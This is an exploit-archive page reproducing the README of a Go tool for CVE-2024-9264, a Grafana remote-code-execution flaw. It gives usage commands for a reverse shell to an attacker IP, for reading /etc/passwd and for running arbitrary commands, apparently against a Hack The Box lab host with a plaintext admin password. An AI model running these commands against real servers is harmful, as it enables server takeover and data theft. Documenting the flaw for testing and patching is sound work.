Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-9264 PoC — Grafana SQL Expressions allow for remote code execution

Source
https://github.com/Cythonic1/CVE-2024-9264
Associated Vulnerability
Title:Grafana SQL Expressions allow for remote code execution (CVE-2024-9264)
Description:The SQL Expressions experimental feature of Grafana allows for the evaluation of `duckdb` queries containing user input. These queries are insufficiently sanitized before being passed to `duckdb`, leading to a command injection and local file inclusion vulnerability. Any user with the VIEWER or higher permission is capable of executing this attack. The `duckdb` binary must be present in Grafana's $PATH for this attack to function; by default, this binary is not installed in Grafana distributions.
Description
A go implementation for CVE-2024-9264 which effect grafana versions 11.0.x, 11.1.x, and 11.2.x.
Readme
# 🚨 CVE-2024-9264 - Grafana SQL injection leading to Remote Code Execution (RCE) and file Read

Exploit tool for [CVE-2024-9264](https://grafana.com/blog/2024/10/17/grafana-security-release-critical-severity-fix-for-cve-2024-9264/), a **critical vulnerability in Grafana** allow authenticated attcker to execute sql query leading to RCE

> 🛡️ This tool is strictly for **educational purposes** and **authorized penetration testing**.  
> Unauthorized use is illegal and unethical.

---

## 🧠 Vulnerability Overview

### 🕳️ What is CVE-2024-9264?

**CVE-2024-9264** is a critical flaw in Grafana allows authenticated attacker to execute sql commands leading to RCE and file read

### 🧬 Root Cause

- Insufficient sanitization.

### 💥 Impact

- **RCE**: Execute arbitrary commands, get reverse shells, or read sensitive files.
- **High Severity**: Complete server takeover possible if successful.

---

## ⚒️ Features

- Supports multiple attack modes:
  - `file` – Read arbitrary files (e.g., `/etc/passwd`)
  - `shell` – Reverse shell to attacker machine
  - `command` – Run arbitrary shell commands (e.g., `whoami`)
- Customizable attacker IP, port, and credentials

---

## 🚀 Usage

![help menu](https://github.com/Cythonic1/CVE-2024-9264/blob/main/img/cmd.png)

Not all of the arguments are nessary.

## examples 

### Getting shell

``` go run main.go  -ip 10.10.16.91 -port 8080 -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type shell ```

### Read files 

``` go run main.go  -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type file -filename /etc/passwd```

### Execuet single command

``` go run main.go  -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type command -cmd 'ls -al' ```

### 🔧 Command-Line Flags

``` go run main.go [flags] ```
File Snapshot

 [4.0K]  /data/pocs/36df6b1d338babf392a21304dc132d6d442fe9dd
├── [  32]  go.mod
├── [4.0K]  img
│   └── [160K]  cmd.png
├── [5.4K]  main.go
└── [1.8K]  README.md

1 directory, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →